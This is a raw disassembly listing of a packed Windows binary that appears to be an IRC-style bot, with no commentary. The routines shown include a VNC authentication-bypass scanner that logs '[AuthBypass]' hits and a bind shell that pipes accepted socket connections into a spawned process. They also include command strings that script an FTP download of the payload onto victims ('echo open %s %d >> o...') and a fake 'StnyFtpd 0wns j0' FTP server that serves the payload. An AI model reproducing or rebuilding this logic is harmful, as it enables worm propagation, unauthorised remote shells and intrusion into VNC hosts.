jz short loc_40E143
lea eax, [ebp+var_10]
push 10h
push eax
push esi
call dword_427214 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40E124
push esi
jmp short loc_40E13D
; ---------------------------------------------------------------------------
loc_40E124: ; CODE XREF: sub_40E0D1+4E�j
push 0
push 1213h
push offset dword_4329BC
push esi
call dword_427224 ; send
cmp eax, 0FFFFFFFFh
push esi
jnz short loc_40E147
loc_40E13D: ; CODE XREF: sub_40E0D1+51�j
call dword_42721C ; closesocket
loc_40E143: ; CODE XREF: sub_40E0D1+3C�j
xor eax, eax
jmp short loc_40E189
; ---------------------------------------------------------------------------
loc_40E147: ; CODE XREF: sub_40E0D1+6A�j
call dword_42721C ; closesocket
push 216Bh
lea esi, [ebp+arg_0]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_40DFE3
add esp, 0C0h
test eax, eax
jz short loc_40E186
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_431B08[eax]
lea eax, dword_431B08[eax]
loc_40E186: ; CODE XREF: sub_40E0D1+9E�j
push 1
pop eax
loc_40E189: ; CODE XREF: sub_40E0D1+74�j
pop edi
pop esi
leave
retn
sub_40E0D1 endp
; =============== S U B R O U T I N E =======================================
sub_40E18D proc near ; CODE XREF: UPX0:0040E27B�p
; UPX0:0040E2DD�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
xor esi, esi
loc_40E195: ; CODE XREF: sub_40E18D+2D�j
test edi, edi
jle short loc_40E1C0
mov eax, [esp+8+arg_4]
push 0
add eax, esi
push edi
push eax
push [esp+14h+arg_0]
call ds:dword_4CB66C ; recv
test eax, eax
jz short loc_40E1BC
cmp eax, 0FFFFFFFFh
jz short loc_40E1BC
sub edi, eax
add esi, eax
jmp short loc_40E195
; ---------------------------------------------------------------------------
loc_40E1BC: ; CODE XREF: sub_40E18D+22�j
; sub_40E18D+27�j
xor eax, eax
jmp short loc_40E1C3
; ---------------------------------------------------------------------------
loc_40E1C0: ; CODE XREF: sub_40E18D+A�j
push 1
pop eax
loc_40E1C3: ; CODE XREF: sub_40E18D+31�j
pop edi
pop esi
retn
sub_40E18D endp
; =============== S U B R O U T I N E =======================================
sub_40E1C6 proc near ; CODE XREF: UPX0:0040E2C7�p
; UPX0:0040E2F4�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_40E203
xor esi, esi
test edi, edi
jle short loc_40E1FD
loc_40E1D6: ; CODE XREF: sub_40E1C6+35�j
mov eax, edi
push 0
sub eax, esi
push eax
mov eax, [esp+10h+arg_4]
add eax, esi
push eax
push [esp+14h+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E203
test eax, eax
jz short loc_40E203
add esi, eax
cmp esi, edi
jl short loc_40E1D6
loc_40E1FD: ; CODE XREF: sub_40E1C6+E�j
push 1
pop eax
loc_40E200: ; CODE XREF: sub_40E1C6+3F�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E203: ; CODE XREF: sub_40E1C6+8�j
; sub_40E1C6+2B�j ...
xor eax, eax
jmp short loc_40E200
sub_40E1C6 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 24Ch
push ebx
mov ax, word_433C00
push esi
push edi
push 0
push 1
push 2
mov [ebp-2], ax
pop esi
push esi
call ds:dword_4CB6D4 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_40E235
push eax
jmp short loc_40E269
; ---------------------------------------------------------------------------
loc_40E235: ; CODE XREF: UPX0:0040E230�j
lea eax, [ebp+0Ch]
push eax
call ds:dword_4CB694 ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-48h], eax
mov [ebp-4Ch], si
call ds:dword_4CB654 ; htons
mov [ebp-4Ah], ax
lea eax, [ebp-4Ch]
push 10h
push eax
push ebx
call ds:dword_4CB5FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40E274
push ebx
loc_40E269: ; CODE XREF: UPX0:0040E233�j
call ds:dword_4CB6EC ; closesocket
jmp loc_40E46F
; ---------------------------------------------------------------------------
loc_40E274: ; CODE XREF: UPX0:0040E266�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40E18D
add esp, 0Ch
test eax, eax
jz loc_40E468
lea eax, [ebp-20h]
and byte ptr [ebp-2Ch], 0
push eax
lea eax, [ebp-28h]
push eax
lea eax, [ebp-38h]
push offset aRfb03d_03d ; "RFB %03d.%03d\n"
push eax
call sub_41C645
add esp, 10h
cmp eax, esi
jnz loc_40E468
cmp dword ptr [ebp-28h], 3
jz short loc_40E2C0
cmp dword ptr [ebp-20h], 8
jnz loc_40E468
loc_40E2C0: ; CODE XREF: UPX0:0040E2B4�j
lea eax, [ebp-38h]
push 0Ch
push eax
push ebx
call sub_40E1C6
add esp, 0Ch
test eax, eax
jz loc_40E468
lea eax, [ebp-3Ch]
push esi
push eax
push ebx
call sub_40E18D
add esp, 0Ch
test eax, eax
jz loc_40E468
lea eax, [ebp-2]
push 1
push eax
push ebx
call sub_40E1C6
add esp, 0Ch
test eax, eax
jz loc_40E468
lea eax, [ebp-24h]
push 4
push eax
push ebx
call sub_40E18D
add esp, 0Ch
test eax, eax
jz loc_40E468
mov eax, [ebp-24h]
mov edi, 0FF0000h
mov ecx, eax
mov edx, eax
and ecx, edi
mov esi, 0FF00h
shr edx, 10h
or ecx, edx
mov edx, eax
shl edx, 10h
and eax, esi
or edx, eax
shr ecx, 8
shl edx, 8
or ecx, edx
mov [ebp-24h], ecx
jnz loc_40E468
push 1
push offset dword_4CB50C
push ebx
call sub_40E1C6
add esp, 0Ch
test eax, eax
jz loc_40E468
lea eax, [ebp-1Ch]
push 18h
push eax
push ebx
call sub_40E18D
add esp, 0Ch
test eax, eax
jz loc_40E468
xor eax, eax
mov ecx, [ebp-8]
mov al, [ebp-1Bh]
mov edx, ecx
mov ah, [ebp-1Ch]
mov [ebp-1Ch], ax
xor eax, eax
mov al, [ebp-19h]
mov ah, [ebp-1Ah]
mov [ebp-1Ah], ax
xor eax, eax
mov al, [ebp-13h]
mov ah, [ebp-14h]
mov [ebp-14h], ax
xor eax, eax
mov al, [ebp-11h]
mov ah, [ebp-12h]
mov [ebp-12h], ax
xor eax, eax
mov al, [ebp-0Fh]
mov ah, [ebp-10h]
mov [ebp-10h], ax
mov eax, ecx
and eax, edi
shr edx, 10h
or eax, edx
mov edx, ecx
shl edx, 10h
and ecx, esi
or edx, ecx
shr eax, 8
shl edx, 8
or eax, edx
mov [ebp-8], eax
add eax, 2
push eax
call sub_41CFC5
mov edi, [ebp-8]
pop ecx
test edi, edi
mov esi, eax
jle short loc_40E3F8
push edi
push esi
push ebx
call sub_40E18D
add esp, 0Ch
loc_40E3F8: ; CODE XREF: UPX0:0040E3EB�j
and byte ptr [edi+esi], 0
lea eax, [ebp+0Ch]
push eax
push esi
push dword ptr [ebp-20h]
lea eax, [ebp-24Ch]
push dword ptr [ebp-28h]
push offset aVncD_DSSAuthby ; "VNC%d.%d %s: %s - [AuthBypass]"
push 200h
push eax
call sub_41B980
push 0
lea eax, [ebp-24Ch]
push dword ptr [ebp+0B8h]
push eax
lea eax, [ebp+1Ch]
push eax
push dword ptr [ebp+8]
call sub_409A73
lea eax, [ebp-24Ch]
push eax
call sub_4151AD
mov eax, [ebp+0B0h]
add esp, 34h
shl eax, 6
inc dword_431B08[eax]
push ebx
lea eax, dword_431B08[eax]
call dword_42721C ; closesocket
push 1
pop eax
jmp short loc_40E471
; ---------------------------------------------------------------------------
loc_40E468: ; CODE XREF: UPX0:0040E285�j
; UPX0:0040E2AA�j ...
push ebx
call dword_42721C ; closesocket
loc_40E46F: ; CODE XREF: UPX0:0040E26F�j
xor eax, eax
loc_40E471: ; CODE XREF: UPX0:0040E466�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40E476 proc near ; DATA XREF: sub_40E504+15B�o
var_404 = byte ptr -404h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40E47F: ; CODE XREF: sub_40E476+25�j
; sub_40E476+41�j
push 0
lea eax, [ebp+var_404]
push 400h
push eax
push ds:dword_4CE394
call ds:dword_4CB66C ; recv
test eax, eax
jle short loc_40E47F
lea ecx, [ebp+var_4]
push 0
push ecx
push eax
lea eax, [ebp+var_404]
push eax
push ds:dword_4CE390
call dword_4270E0 ; WriteFile
jmp short loc_40E47F
sub_40E476 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40E4B9 proc near ; DATA XREF: sub_40E504+142�o
var_404 = byte ptr -404h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 404h
loc_40E4C2: ; CODE XREF: sub_40E4B9+2F�j
; sub_40E4B9+49�j
lea eax, [ebp+var_4]
and [ebp+var_4], 0
push 0
push eax
lea eax, [ebp+var_404]
push 400h
push eax
push ds:dword_4CE384
call dword_4270E8 ; ReadFile
cmp [ebp+var_4], 0
jle short loc_40E4C2
push 0
lea eax, [ebp+var_404]
push [ebp+var_4]
push eax
push ds:dword_4CE394
call ds:dword_4CB6A4 ; send
jmp short loc_40E4C2
sub_40E4B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_40E504 proc near ; DATA XREF: sub_401ACD+2D0E�o
var_11C = byte ptr -11Ch
var_98 = dword ptr -98h
var_7C = dword ptr -7Ch
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = byte ptr -3Ch
var_38 = word ptr -38h
var_36 = word ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 28h
mov esi, eax
pop ecx
lea edi, [ebp+var_11C]
rep movsd
push 1
xor edi, edi
pop esi
mov [eax+98h], esi
push 10h
lea eax, [ebp+var_38]
push edi
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_38], 2
push [ebp+var_98]
call ds:dword_4CB654 ; htons
push 6
push esi
push 2
mov [ebp+var_36], ax
call ds:dword_4CB6D4 ; socket
mov [ebp+arg_0], eax
lea eax, [ebp+var_38]
push 10h
push eax
push [ebp+arg_0]
call ds:dword_4CB680 ; bind
push 5
push [ebp+arg_0]
call ds:dword_4CB67C ; listen
mov ebx, dword_4270FC
mov esi, dword_427068
loc_40E584: ; CODE XREF: sub_40E504+1CB�j
push edi
push edi
push [ebp+arg_0]
call ds:dword_4CB6E8 ; accept
mov ds:dword_4CE394, eax
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE390
push offset dword_4CE38C
mov [ebp+var_C], 0Ch
mov [ebp+var_4], 1
mov [ebp+var_8], edi
call ebx ; CreatePipe
lea eax, [ebp+var_C]
push edi
push eax
push offset dword_4CE388
push offset dword_4CE384
call ebx ; CreatePipe
push 44h
lea eax, [ebp+var_7C]
push edi
push eax
call sub_41B590
mov eax, ds:dword_4CE38C
add esp, 0Ch
mov [ebp+var_44], eax
mov eax, ds:dword_4CE388
mov [ebp+var_40], eax
push edi
push 1
lea eax, [ebp+var_3C]
push 2
push eax
mov [ebp+var_7C], 44h
mov [ebp+var_50], 101h
mov [ebp+var_4C], di
call dword_4270F8 ; GetCurrentProcess
push eax
push ds:dword_4CE388
call dword_4270F8 ; GetCurrentProcess
push eax
call dword_4270F4 ; DuplicateHandle
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_7C]
push eax
push edi
push edi
push 4000090h
lea eax, [ebp+var_C]
push 1
push eax
lea eax, [ebp+var_C]
push eax
push offset dword_433C04
push edi
call dword_42706C ; CreateProcessA
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40E4B9
lea eax, [ebp+var_C]
push edi
push eax
call dword_42707C ; CreateThread
mov [ebp+var_14], eax
lea eax, [ebp+var_18]
push eax
push edi
push edi
push offset sub_40E476
lea eax, [ebp+var_C]
push edi
push eax
call dword_42707C ; CreateThread
push 0FFFFFFFFh
mov [ebp+var_10], eax
push [ebp+var_28]
call dword_4270A0 ; WaitForSingleObject
push edi
push [ebp+var_10]
call dword_4270AC ; TerminateThread
push edi
push [ebp+var_14]
call dword_4270AC ; TerminateThread
push [ebp+var_10]
call esi ; CloseHandle
push [ebp+var_14]
call esi ; CloseHandle
push edi
push [ebp+var_28]
call dword_4270F0 ; TerminateProcess
push ds:dword_4CE38C
call esi ; CloseHandle
push ds:dword_4CE390
call esi ; CloseHandle
push ds:dword_4CE384
call esi ; CloseHandle
push ds:dword_4CE388
call esi ; CloseHandle
push [ebp+var_24]
call esi ; CloseHandle
push [ebp+var_28]
call esi ; CloseHandle
jmp loc_40E584
sub_40E504 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E6D4 proc near ; DATA XREF: UPX0:00429010�o
jmp $+5
sub_40E6D4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E6D9 proc near
push 0FFFEh
push 400h
call sub_418685
pop ecx
mov ds:dword_4CE39C, eax
pop ecx
retn
sub_40E6D9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E6F0 proc near ; DATA XREF: sub_40BACE+34D�o
var_6C0 = byte ptr -6C0h
var_2C0 = byte ptr -2C0h
var_C0 = byte ptr -0C0h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A4 = dword ptr -0A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 6C0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 27h
mov esi, eax
pop ecx
lea edi, [ebp+var_B0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [eax+98h], esi
push 10h
lea eax, [ebp+var_14]
push ebx
push eax
call sub_41B590
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+var_A4]
call ds:dword_4CB654 ; htons
push ebx
push esi
push 2
mov [ebp+var_12], ax
mov [ebp+var_10], ebx
call ds:dword_4CB6D4 ; socket
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jnz short loc_40E797
cmp [ebp+var_1C], ebx
jnz short loc_40E777
push ebx
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409A73
add esp, 14h
loc_40E777: ; CODE XREF: sub_40E6F0+65�j
lea eax, [ebp+var_2C0]
push eax
call sub_4151AD
push [ebp+var_AC]
call sub_40B413
pop ecx
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_40E797: ; CODE XREF: sub_40E6F0+60�j
mov eax, [ebp+var_AC]
push 10h
imul eax, 234h
mov dword_43E59C[eax], edi
lea eax, [ebp+var_14]
push eax
push edi
call ds:dword_4CB680 ; bind
cmp eax, esi
mov ebx, 400h
jnz loc_40E892
call ds:dword_4CB5E8 ; WSAGetLastError
cmp eax, 2740h
jz short loc_40E817
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40E7F7
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409A73
add esp, 14h
loc_40E7F7: ; CODE XREF: sub_40E6F0+E5�j
lea eax, [ebp+var_2C0]
push eax
call sub_4151AD
push [ebp+var_AC]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_40E817: ; CODE XREF: sub_40E6F0+DE�j
push 0FFFEh
push ebx
call sub_418685
pop ecx
mov ds:dword_4CE39C, eax
pop ecx
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
call ds:dword_4CB680 ; bind
cmp eax, esi
jnz short loc_40E892
call ds:dword_4CB5E8 ; WSAGetLastError
xor esi, esi
cmp [ebp+var_1C], esi
jnz short loc_40E872
cmp eax, 2740h
jz short loc_40E872
push esi
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409A73
add esp, 14h
loc_40E872: ; CODE XREF: sub_40E6F0+159�j
; sub_40E6F0+160�j
lea eax, [ebp+var_2C0]
push eax
call sub_4151AD
push [ebp+var_AC]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
loc_40E892: ; CODE XREF: sub_40E6F0+CD�j
; sub_40E6F0+14C�j
push 5
push edi
call ds:dword_4CB67C ; listen
cmp eax, esi
jz loc_40E977
mov [ebp+var_4], 10h
mov esi, offset byte_429110
loc_40E8AF: ; CODE XREF: sub_40E6F0+1D7�j
; sub_40E6F0+227�j ...
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C0]
push eax
push edi
call ds:dword_4CB6E8 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_40E8AF
cmp [ebp+var_1C], 0
jnz short loc_40E8F0
push 0
lea eax, [ebp+var_2C0]
push [ebp+var_20]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_B0]
call sub_409A73
add esp, 14h
loc_40E8F0: ; CODE XREF: sub_40E6F0+1DD�j
lea eax, [ebp+var_2C0]
push eax
call sub_4151AD
pop ecx
lea eax, [ebp+var_2C0]
push 0
push 200h
push eax
push [ebp+arg_0]
call ds:dword_4CB66C ; recv
cmp eax, 0FFFFFFFFh
jz short loc_40E8AF
push esi
push esi
push ds:dword_4CB390
push [ebp+var_B0]
call sub_40AC10
pop ecx
push eax
push offset aEchoOpenSDOEch ; "echo open %s %d >> o&echo user 1 >>o &e"...
lea eax, [ebp+var_6C0]
push ebx
push eax
call sub_41B980
add esp, 1Ch
lea eax, [ebp+var_6C0]
push 0
push eax
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_6C0]
push eax
push [ebp+arg_0]
call ds:dword_4CB6A4 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E8AF
inc ds:dword_4CE3A4
jmp loc_40E8AF
; ---------------------------------------------------------------------------
loc_40E977: ; CODE XREF: sub_40E6F0+1AD�j
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_AC]
call sub_40B413
pop ecx
push 0
call dword_4270CC ; ExitThread
sub_40E6F0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E992 proc near ; DATA XREF: sub_40BACE+22A�o
var_A70 = byte ptr -0A70h
var_8E0 = byte ptr -8E0h
var_6E0 = dword ptr -6E0h
var_4C8 = byte ptr -4C8h
var_448 = dword ptr -448h
var_444 = dword ptr -444h
var_43C = dword ptr -43Ch
var_338 = byte ptr -338h
var_2D4 = byte ptr -2D4h
var_2A0 = byte ptr -2A0h
var_23C = byte ptr -23Ch
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_128 = byte ptr -128h
var_FC = byte ptr -0FCh
var_C8 = byte ptr -0C8h
var_B0 = byte ptr -0B0h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_3C = byte ptr -3Ch
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A70h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 1
mov ecx, 0A9h
mov esi, eax
lea edi, [ebp+var_6E0]
pop ebx
rep movsd
mov [eax+2A0h], ebx
lea eax, [ebp+var_A70]
xor esi, esi
push eax
push 101h
mov [ebp+var_1C], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_24], ebx
mov [ebp+var_22C], esi
mov [ebp+var_43C], esi
call dword_4271F0 ; WSAStartup
push esi
push ebx
push 2
call dword_427220 ; socket
mov esi, dword_4271F4
lea ecx, [ebp+var_1C]
push 4
push ecx
mov edi, 0FFFFh
push 4
push edi
push eax
mov [ebp+var_8], eax
call esi ; setsockopt
lea eax, [ebp+var_2C]
push 4
push eax
push 0FFFFFFFBh
push edi
mov edi, [ebp+var_8]
push edi
call esi ; setsockopt
lea eax, [ebp+var_24]
push eax
push 8004667Eh
push edi
call dword_4271F8 ; ioctlsocket
mov ax, word ptr ds:dword_4CB390
and [ebp+var_48], 0
push eax
mov [ebp+var_4C], 2
call ds:dword_4CB654 ; htons
mov [ebp+var_4A], ax
lea eax, [ebp+var_4C]
push 10h
push eax
push edi
call dword_4271FC ; bind
test eax, eax
jge short loc_40EA58
mov eax, ebx
jmp loc_40EFB8
; ---------------------------------------------------------------------------
loc_40EA58: ; CODE XREF: sub_40E992+BD�j
push 0Ah
push edi
call dword_427200 ; listen
mov [ebp+var_22C], ebx
mov ebx, dword_427224
mov [ebp+var_228], edi
mov [ebp+var_4], edi
loc_40EA76: ; CODE XREF: sub_40E992+11D�j
; sub_40E992+61E�j
push 41h
lea esi, [ebp+var_22C]
pop ecx
lea edi, [ebp+var_43C]
rep movsd
xor esi, esi
lea eax, [ebp+var_43C]
push esi
push esi
push esi
push eax
mov eax, [ebp+var_4]
inc eax
push eax
call dword_427228 ; select
cmp eax, 0FFFFFFFFh
jz loc_40EFB5
xor edi, edi
cmp [ebp+var_4], esi
mov [ebp+arg_0], edi
jl short loc_40EA76
loc_40EAB1: ; CODE XREF: sub_40E992+618�j
xor esi, esi
push 64h
lea eax, [ebp+var_2A0]
push esi
push eax
call sub_41B590
push 64h
lea eax, [ebp+var_B0]
push esi
push eax
call sub_41B590
add esp, 18h
lea eax, [ebp+var_43C]
push eax
push edi
call sub_426756 ; __WSAFDIsSet
test eax, eax
jz loc_40EFA3
cmp edi, [ebp+var_8]
jnz short loc_40EB68
lea eax, [ebp+var_10]
mov [ebp+var_10], 10h
push eax
lea eax, [ebp+var_23C]
push eax
push [ebp+var_8]
call dword_427204 ; accept
cmp eax, 0FFFFFFFFh
jz loc_40EFA3
xor ecx, ecx
cmp [ebp+var_22C], esi
jbe short loc_40EB32
lea edx, [ebp+var_228]
loc_40EB22: ; CODE XREF: sub_40E992+19E�j
cmp [edx], eax
jz short loc_40EB32
inc ecx
add edx, 4
cmp ecx, [ebp+var_22C]
jb short loc_40EB22
loc_40EB32: ; CODE XREF: sub_40E992+188�j
; sub_40E992+192�j
cmp ecx, [ebp+var_22C]
jnz short loc_40EB50
cmp [ebp+var_22C], 40h
jnb short loc_40EB50
mov [ebp+ecx*4+var_228], eax
inc [ebp+var_22C]
loc_40EB50: ; CODE XREF: sub_40E992+1A6�j
; sub_40E992+1AF�j
cmp eax, [ebp+var_4]
jle short loc_40EB58
mov [ebp+var_4], eax
loc_40EB58: ; CODE XREF: sub_40E992+1C1�j
push esi
push 15h
push offset a220Stnyftpd0wn ; "220 StnyFtpd 0wns j0\n"
push eax
call ebx ; send
jmp loc_40EFA3
; ---------------------------------------------------------------------------
loc_40EB68: ; CODE XREF: sub_40E992+15A�j
push esi
lea eax, [ebp+var_2A0]
push 64h
push eax
push edi
call dword_427218 ; recv
test eax, eax
jg short loc_40EBCF
mov edx, [ebp+var_22C]
xor ecx, ecx
cmp edx, esi
jbe short loc_40EBC3
lea eax, [ebp+var_228]
loc_40EB8F: ; CODE XREF: sub_40E992+207�j
cmp [eax], edi
jz short loc_40EB9D
inc ecx
add eax, 4
cmp ecx, edx
jb short loc_40EB8F
jmp short loc_40EBC3
; ---------------------------------------------------------------------------
loc_40EB9D: ; CODE XREF: sub_40E992+1FF�j
dec edx
cmp ecx, edx
jnb short loc_40EBBD
lea eax, [ebp+ecx*4+var_228]
loc_40EBA9: ; CODE XREF: sub_40E992+229�j
mov edx, [eax+4]
inc ecx
mov [eax], edx
mov edx, [ebp+var_22C]
add eax, 4
dec edx
cmp ecx, edx
jb short loc_40EBA9
loc_40EBBD: ; CODE XREF: sub_40E992+20E�j
dec [ebp+var_22C]
loc_40EBC3: ; CODE XREF: sub_40E992+1F5�j
; sub_40E992+209�j
push edi
call dword_42721C ; closesocket
jmp loc_40EFA3
; ---------------------------------------------------------------------------
loc_40EBCF: ; CODE XREF: sub_40E992+1E9�j
lea eax, [ebp+var_338]
push eax
lea eax, [ebp+var_B0]
push eax
lea eax, [ebp+var_2A0]
push offset aSS_0 ; "%s %s"
push eax
call sub_41C645
lea eax, [ebp+var_B0]
push offset aUser_1 ; "USER"
push eax
call sub_41C070
add esp, 18h
test eax, eax
jnz short loc_40EC13
push esi
push 16h
push offset a331PasswordReq ; "331 Password required\n"
jmp loc_40EC95
; ---------------------------------------------------------------------------
loc_40EC13: ; CODE XREF: sub_40E992+272�j
lea eax, [ebp+var_B0]
push offset aPass ; "PASS"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC34
push esi
push 14h
push offset a230UserLoggedI ; "230 User logged in.\n"
jmp short loc_40EC95
; ---------------------------------------------------------------------------
loc_40EC34: ; CODE XREF: sub_40E992+296�j
lea eax, [ebp+var_B0]
push offset aSyst ; "SYST"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC55
push esi
push 0Dh
push offset a215Stnyftpd ; "215 StnyFtpd\n"
jmp short loc_40EC95
; ---------------------------------------------------------------------------
loc_40EC55: ; CODE XREF: sub_40E992+2B7�j
lea eax, [ebp+var_B0]
push offset aRest ; "REST"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC76
push esi
push 10h
push offset a350Restarting_ ; "350 Restarting.\n"
jmp short loc_40EC95
; ---------------------------------------------------------------------------
loc_40EC76: ; CODE XREF: sub_40E992+2D8�j
lea eax, [ebp+var_B0]
push offset off_433E54
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40EC9B
push esi
push 1Eh
push offset a257IsCurrentDi ; "257 \"/\" is current directory.\n"
loc_40EC95: ; CODE XREF: sub_40E992+27C�j
; sub_40E992+2A0�j ...
push edi
jmp loc_40EF8C
; ---------------------------------------------------------------------------
loc_40EC9B: ; CODE XREF: sub_40E992+2F9�j
mov edi, offset aType ; "TYPE"
lea eax, [ebp+var_B0]
push edi
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ECD7
lea eax, [ebp+var_338]
push offset aA_0 ; "A"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ECD7
push esi
push 13h
push offset a200TypeSetToA_ ; "200 Type set to A.\n"
jmp loc_40EF89
; ---------------------------------------------------------------------------
loc_40ECD7: ; CODE XREF: sub_40E992+31F�j
; sub_40E992+336�j
lea eax, [ebp+var_B0]
push edi
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ED0E
lea eax, [ebp+var_338]
push offset aI_0 ; "I"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ED0E
push esi
push 13h
push offset a200TypeSetToI_ ; "200 Type set to I.\n"
jmp loc_40EF89
; ---------------------------------------------------------------------------
loc_40ED0E: ; CODE XREF: sub_40E992+356�j
; sub_40E992+36D�j
lea eax, [ebp+var_B0]
push offset aPasv ; "PASV"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ED59
push 0Ah
mov esi, offset a425PassiveNotS ; "425 Passive not supported on this serve"...
pop ecx
lea edi, [ebp+var_128]
rep movsd
push eax
lea eax, [ebp+var_128]
push eax
movsw
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_128]
loc_40ED4C: ; CODE XREF: sub_40E992+406�j
push eax
push [ebp+arg_0]
call ebx ; send
xor esi, esi
jmp loc_40EF8E
; ---------------------------------------------------------------------------
loc_40ED59: ; CODE XREF: sub_40E992+391�j
lea eax, [ebp+var_B0]
push offset aList_0 ; "LIST"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_40ED9A
push 5
mov esi, offset a226TransferCom ; "226 Transfer complete\n"
pop ecx
lea edi, [ebp+var_C8]
rep movsd
movsw
push eax
lea eax, [ebp+var_C8]
push eax
movsb
call sub_41AFE0
pop ecx
push eax
lea eax, [ebp+var_C8]
jmp short loc_40ED4C
; ---------------------------------------------------------------------------
loc_40ED9A: ; CODE XREF: sub_40E992+3DC�j
lea eax, [ebp+var_B0]
push offset aPort ; "PORT"
push eax
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz loc_40EE6B
lea eax, [ebp+var_2D4]
push eax
lea eax, [ebp+var_FC]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_2A0]
push offset aS ; "%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
push eax
call sub_41C645
lea eax, [ebp+var_FC]
push eax
call sub_41B779
mov edi, eax
lea eax, [ebp+var_2D4]
push eax
call sub_41B779
mov [ebp+var_C], eax
push 32h
lea eax, [ebp+var_FC]
push esi
push eax
call sub_41B590
add esp, 34h
lea eax, [ebp+var_FC]
push [ebp+var_C]
push edi
